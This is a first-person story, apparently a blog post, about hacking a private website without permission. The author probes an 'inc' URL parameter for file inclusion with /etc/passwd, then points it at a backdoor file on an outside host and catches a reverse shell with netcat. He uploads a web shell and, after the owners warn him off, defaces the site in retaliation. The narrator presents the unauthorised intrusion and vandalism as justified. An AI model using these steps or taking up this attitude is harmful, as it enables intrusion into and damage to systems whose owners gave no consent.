This is the story of how I hacked a private website and all I got a police threat instead of saying thanks for giving bounty or their vulnerability report. It was a hot day and I was totally bored. To tackle my boredom, I decided to do some research on web security. So, I selected a target which was a private website. The test begins with my own tool, Scrab The Web (STW for short.), which do automate the process of web hacking and finding vulnerabilities and exploiting them in a different way. After 10 minutes I read the status of the website and started checking for vulnerabilities manually.
I was shocked when I opened a page URL like .php?inc=, I tried to exploit Local file inclusion but didn’t found any LFI vulnerability. It was completely a headache. The real structure of that parameter was php?inc=show.php. I changed php?inc=/etc/passwd, even I tried LFI exploiter tools, tried WAF bypass but failed. I changed the value php?inc=show.php to index.php it showed index.php in that page. Again I was shocked, the developer used file_get_contents(); function.
An evil Idea comes to my mind I changed the parameter to my backdoor link like php?inc=https://sprotechs.com/backdoor.php. I started netcat and tried to back-connect using the reverse shell backdoor and I got a sessing. I was able to read write change files. Simply, I uploaded a shell and reported to Administration. After a couple of hours, I received their message which was “Don’t exploit or steal user credentials, or we will inform the police”. It broke my heart and I defaced the website.